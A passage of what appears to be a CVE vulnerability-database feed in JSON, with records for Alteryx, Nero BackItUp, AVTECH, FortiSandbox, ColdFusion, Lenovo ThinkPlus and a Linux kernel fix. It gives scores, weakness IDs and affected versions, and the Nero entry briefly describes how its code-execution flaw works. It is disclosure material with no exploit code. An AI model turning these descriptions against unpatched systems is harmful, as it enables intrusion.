Records retrievable using this attack included administrative API keys and private studio api keys."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-648"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:alteryx:alteryx_server:*:*:*:*:*:*:*:*","versionStartIncluding":"2022.1.0","versionEndIncluding":"2022.1.1.42654","matchCriteriaId":"CF563DE9-5380-4D51-AC09-8180C1A04553"}]}]}],"references":[{"url":"https://aleksazatezalo.medium.com/alteryx-server-idor-advisory-782e3013ee38","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]},{"url":"https://help.alteryx.com/current/en/server/api-overview.html","source":"cve@mitre.org","tags":["Product"]},{"url":"https://help.alteryx.com/current/en/server/api-overview/alteryx-server-api-v3/server-api-configuration-and-authorization.html","source":"cve@mitre.org","tags":["Product"]}]}},{"cve":{"id":"CVE-2025-63680","sourceIdentifier":"cve@mitre.org","published":"2025-11-14T19:16:01.360","lastModified":"2026-06-01T12:22:07.410","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Nero BackItUp in the Nero Productline is vulnerable to a path parsing/UI rendering flaw (CWE-22) that, in combination with Windows ShellExecuteW fallback extension resolution, leads to arbitrary code execution when a user 
clicks a crafted entry. By creating a trailing-dot folder and placing a same-basename script, Nero BackItUp renders the file as a folder icon and then invokes ShellExecuteW, which executes the script via PATHEXT fallback (.COM/.EXE/.BAT/.CMD). The issue affects recent Nero BackItUp product lines (2019-2025 and earlier) and has been acknowledged by the vendor."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H","baseScore":8.6,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":6.0}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:nero:backitup:*:*:*:*:*:*:*:*","versionEndIncluding":"2025","matchCriteriaId":"C0417A0B-91DC-49AE-B1D5-0280F523AC70"}]}]}],"references":[{"url":"https://github.com/PotatoHamm/Nero-Productline-Vulnerability","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-57201","sourceIdentifier":"cve@mitre.org","published":"2025-12-03T16:15:57.137","lastModified":"2026-06-01T12:21:51.393","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the SMB server function. 
This vulnerability allows attackers to execute arbitrary commands via a crafted input."}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-77"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:avtech:dgm1104_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"2EE9FE6D-6B3B-4244-84A6-7CA780064BE4"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:avtech:dgm1104:-:*:*:*:*:*:*:*","matchCriteriaId":"C94DD873-8D0F-4703-A27C-8DBCAE839BBC"}]}]}],"references":[{"url":"http://avtech.com","source":"cve@mitre.org","tags":["Product"]},{"url":"http://dgm1104.com","source":"cve@mitre.org","tags":["Broken Link"]},{"url":"https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57201","source":"cve@mitre.org","tags":["Exploit","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-53679","sourceIdentifier":"psirt@fortinet.com","published":"2025-12-09T18:15:53.477","lastModified":"2026-06-01T12:20:05.217","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions, FortiSandbox Cloud 24.1, FortiSandbox Cloud 23 all versions allows a 
remote privileged attacker to execute unauthorized code or commands via crafted HTTP or HTTPS requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@fortinet.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","baseScore":7.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.2,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@fortinet.com","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*","versionStartIncluding":"4.0.0","versionEndExcluding":"4.4.8","matchCriteriaId":"C0B145A7-83A1-4ED2-A9DC-109CAB0AB217"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.0","versionEndExcluding":"5.0.3","matchCriteriaId":"7A1CEA31-8309-4B13-8A3C-4830394A728D"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox_cloud:*:*:*:*:*:*:*:*","versionStartIncluding":"23.1.4245","versionEndExcluding":"23.4.4374","matchCriteriaId":"31574D18-7175-4634-B191-99080F0FAF2F"},{"vulnerable":true,"criteria":"cpe:2.3:a:fortinet:fortisandbox_cloud:24.1.4436:*:*:*:*:*:*:*","matchCriteriaId":"529FB46C-C0E5-43F5-A753-DD9E928FD4E6"}]}]}],"references":[{"url":"https://fortiguard.fortinet.com/psirt/FG-IR-25-454","source":"psirt@fortinet.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-61813","sourceIdentifier":"psirt@adobe.com","published":"2025-12-10T00:16:09.990","lastModified":"2026-06-01T12:19:31.863","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity 
Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does require user interaction and scope is changed."}],"metrics":{"cvssMetricV31":[{"source":"psirt@adobe.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N","baseScore":7.4,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":4.0}]},"weaknesses":[{"source":"psirt@adobe.com","type":"Secondary","description":[{"lang":"en","value":"CWE-611"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:-:*:*:*:*:*:*","matchCriteriaId":"7A94B406-C011-4673-8C2B-0DD94D46CC4C"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update1:*:*:*:*:*:*","matchCriteriaId":"AFD05E3A-10F9-4C75-9710-BA46B66FF6E6"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update10:*:*:*:*:*:*","matchCriteriaId":"F1FC7D1D-6DD2-48B2-980F-B001B0F24473"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update11:*:*:*:*:*:*","matchCriteriaId":"1FA19E1D-61C2-4640-AF06-4BCFE750BDF3"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update12:*:*:*:*:*:*","matchCriteriaId":"3F331DEA-F3D0-4B1
3-AB1E-6FE39B2BB55D"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update13:*:*:*:*:*:*","matchCriteriaId":"63D5CF84-4B0D-48AE-95D6-262AEA2FFDE8"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update14:*:*:*:*:*:*","matchCriteriaId":"10616A3A-0C1C-474A-BD7D-A2A5BB870F74"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update15:*:*:*:*:*:*","matchCriteriaId":"D7DA523E-1D9B-45FD-94D9-D4F9F2B9296B"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update16:*:*:*:*:*:*","matchCriteriaId":"151AFF8B-F05C-4D27-85FC-DF88E9C11BEA"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update17:*:*:*:*:*:*","matchCriteriaId":"53A0E245-2915-4DFF-AFB5-A12F5C435702"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update18:*:*:*:*:*:*","matchCriteriaId":"C5653D18-7534-48A3-819F-9F049A418F99"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update19:*:*:*:*:*:*","matchCriteriaId":"BABC6468-A780-4080-A930-4125D1B39C51"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update2:*:*:*:*:*:*","matchCriteriaId":"D57C8681-AC68-47DF-A61E-B5C4B4A47663"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update20:*:*:*:*:*:*","matchCriteriaId":"F58633C9-E957-46B7-8F5B-B060A8726E33"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update21:*:*:*:*:*:*","matchCriteriaId":"3CF83653-86BB-461A-87F8-65D99EF2276E"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update22:*:*:*:*:*:*","matchCriteriaId":"C2C67E15-22DE-44C0-8CB1-9AF8FCF09FA5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update3:*:*:*:*:*:*","matchCriteriaId":"75608383-B727-48D6-8FFA-D552A338A562"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update4:*:*:*:*:*:*","matchCriteriaId":"7773DB68-414A-4BA9-960F-52471A784379"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update5:*:*:*:*:*:*","matchCriteriaId":"B38B9E86-BCD5-4BCA-
8FB7-EC55905184E6"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update6:*:*:*:*:*:*","matchCriteriaId":"5E7BAB80-8455-4570-A2A2-8F40469EE9CC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update7:*:*:*:*:*:*","matchCriteriaId":"F9D645A2-E02D-4E82-A2BD-0A7DE5B8FBCC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update8:*:*:*:*:*:*","matchCriteriaId":"6E22D701-B038-4795-AA32-A18BC93C2B6F"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2021:update9:*:*:*:*:*:*","matchCriteriaId":"CAC4A0EC-C3FC-47D8-86CE-0E6A87A7F0B0"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:-:*:*:*:*:*:*","matchCriteriaId":"B02A37FE-5D31-4892-A3E6-156A8FE62D28"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update1:*:*:*:*:*:*","matchCriteriaId":"0AA3D302-CFEE-4DFD-AB92-F53C87721BFF"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update10:*:*:*:*:*:*","matchCriteriaId":"645D1B5F-2DAB-4AB8-A465-AC37FF494F95"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update11:*:*:*:*:*:*","matchCriteriaId":"ED6D8996-0770-4C9F-BEA5-87EA479D40A5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update12:*:*:*:*:*:*","matchCriteriaId":"4836086E-3D4A-4A07-A372-382D385CB490"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update13:*:*:*:*:*:*","matchCriteriaId":"CBC19168-4184-4B59-B9C8-E98844124EED"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update14:*:*:*:*:*:*","matchCriteriaId":"A60DCD92-9A5B-411C-9554-642C91D77FAE"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update15:*:*:*:*:*:*","matchCriteriaId":"58CC65EF-60A3-4DFA-AA51-E5013F116CEA"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update16:*:*:*:*:*:*","matchCriteriaId":"2E3EBFB1-4488-4924-A2E2-B7E422D68345"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update2:*:*:*:*:*:*","matchCriteriaId":"EB88D4FE-5496-4639-BAF2-9F29F2
4ABF29"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update3:*:*:*:*:*:*","matchCriteriaId":"43E0ED98-2C1F-40B8-AF60-FEB1D85619C0"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update4:*:*:*:*:*:*","matchCriteriaId":"76204873-C6E0-4202-8A03-0773270F1802"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update5:*:*:*:*:*:*","matchCriteriaId":"C1A22BE9-0D47-4BA8-8BDB-9B12D7A0F7C7"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update6:*:*:*:*:*:*","matchCriteriaId":"E3A83642-BF14-4C37-BD94-FA76AABE8ADC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update7:*:*:*:*:*:*","matchCriteriaId":"A892E1DC-F2C8-4F53-8580-A2D1BEED5A25"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update8:*:*:*:*:*:*","matchCriteriaId":"DB97ADBA-C1A9-4EE0-9509-68CB12358AE5"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2023:update9:*:*:*:*:*:*","matchCriteriaId":"E17C38F0-9B0F-4433-9CBD-6E3D63EA9BDC"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:-:*:*:*:*:*:*","matchCriteriaId":"30779417-D4E5-4A01-BE0E-1CE1D134292A"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update1:*:*:*:*:*:*","matchCriteriaId":"80D7FC6A-F264-4CB1-A18D-B091EBA47882"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update2:*:*:*:*:*:*","matchCriteriaId":"E3DA0D20-93BA-4C76-A400-159853CD7277"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update3:*:*:*:*:*:*","matchCriteriaId":"5BAB6F21-61F1-43AB-88BA-553CD9AD6C0E"},{"vulnerable":true,"criteria":"cpe:2.3:a:adobe:coldfusion:2025:update4:*:*:*:*:*:*","matchCriteriaId":"C85288B9-5D63-49EA-828A-8DB3BB2367F6"}]}]}],"references":[{"url":"https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html","source":"psirt@adobe.com","tags":["Vendor 
Advisory"]}]}},{"cve":{"id":"CVE-2025-13453","sourceIdentifier":"psirt@lenovo.com","published":"2026-01-14T23:15:55.483","lastModified":"2026-06-01T12:20:03.347","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A potential vulnerability was reported in some ThinkPlus USB drives that could allow a user with physical access to read data stored on the drive."},{"lang":"es","value":"Una posible vulnerabilidad fue reportada en algunas unidades USB ThinkPlus que podría permitir a un usuario con acceso físico leer datos almacenados en la unidad."}],"metrics":{"cvssMetricV40":[{"source":"psirt@lenovo.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort"
:"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"psirt@lenovo.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@lenovo.com","type":"Secondary","description":[{"lang":"en","value":"CWE-311"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5A5460E2-3400-4446-8D8D-8ED4E145A878"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*","matchCriteriaId":"59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*","matchCriteriaId":"9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:
thinkplus_tu800_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5BE554C0-C967-4D36-9775-9DF07292A3E5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*","matchCriteriaId":"22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*","matchCriteriaId":"D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}],"references":[{"url":"https://iknow.lenovo.com.cn/detail/436983","source":"psirt@lenovo.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2025-13454","sourceIdentifier":"psirt@lenovo.com","published":"2026-01-14T23:15:55.647","lastModified":"2026-06-01T12:20:07.020","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"A potential vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to gain access to sensitive device information."},{"lang":"es","value":"Una posible vulnerabilidad fue reportada en el software de configuración ThinkPlus que podría permitir a un usuario local autenticado obtener acceso a información sensible del 
dispositivo."}],"metrics":{"cvssMetricV40":[{"source":"psirt@lenovo.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.8,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"psirt@lenovo.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.
1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@lenovo.com","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5A5460E2-3400-4446-8D8D-8ED4E145A878"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*","matchCriteriaId":"59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*","matchCriteriaId":"9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"5BE554C0-C967-4D36-9775-9DF07292A3E5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*","matchCriteriaId":"22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*","matchCriteriaId":"6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerabl
e":false,"criteria":"cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*","matchCriteriaId":"D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}],"references":[{"url":"https://iknow.lenovo.com.cn/detail/436983","source":"psirt@lenovo.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-23252","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2026-03-18T18:16:23.233","lastModified":"2026-06-01T14:07:25.660","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: get rid of the xchk_xfile_*_descr calls\n\nThe xchk_xfile_*_descr macros call kasprintf, which can fail to allocate\nmemory if the formatted string is larger than 16 bytes (or whatever the\nnofail guarantees are nowadays).  Some of them could easily exceed that,\nand Jiaming Zhang found a few places where that can happen with syzbot.\n\nThe descriptions are debugging aids and aren't required to be unique, so\nlet's just pass in static strings and eliminate this path to 